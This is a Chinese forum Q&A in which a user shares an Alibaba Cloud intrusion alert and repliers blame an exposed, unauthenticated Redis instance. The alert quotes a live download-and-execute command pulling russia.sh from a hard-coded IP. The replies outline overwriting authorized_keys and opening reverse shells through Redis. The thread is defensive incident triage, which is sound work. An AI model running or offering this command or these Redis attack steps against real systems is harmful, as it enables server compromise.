收到阿里云紧急安全事件提醒怎么办?
这是咋回事?我的云服务器只能是公钥登录,都不能账号密码呀,黑客是怎么来我的服务器上执行代码的?
难道是因为我开了 redis 的原因吗?
通过 redis 的安全漏洞入侵的?
该告警由如下引擎检测发现:命令行: sh -c (wget -O /tmp/russ http://106.246.224.219/russia.sh || curl -o /tmp/russ http://106.246.224.219/russia.sh); chmod 700 /tmp/russ; /tmp/russ
进程PID: 756468
进程文件名: dash
父进程ID: 632
父进程: redis-check-rdb
父进程文件路径: /usr/bin/redis-check-rdb
进程链:
-[632] /usr/bin/redis-server *:6379
事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。
回答:
是不是redis没有密码而且端口开放在公网了
百度一下可以找到很多关于redis的漏洞和工具
也不是 ssh密钥登录就安全,用密钥登录可以防被猜密码
redis有权限的话可以直接覆盖~/.ssh/authorized_keys,黑客替换之后就能直接登录ssh
回答:
如果你把redis的端口6379公开访问的话,而且redis的密码为空或者是弱口令的话就会被黑客利用,一般黑客利用redis提权都是直接执行反弹shell的。
以上是 收到阿里云紧急安全事件提醒怎么办? 的全部内容, 来源链接: utcz.com/p/944287.html
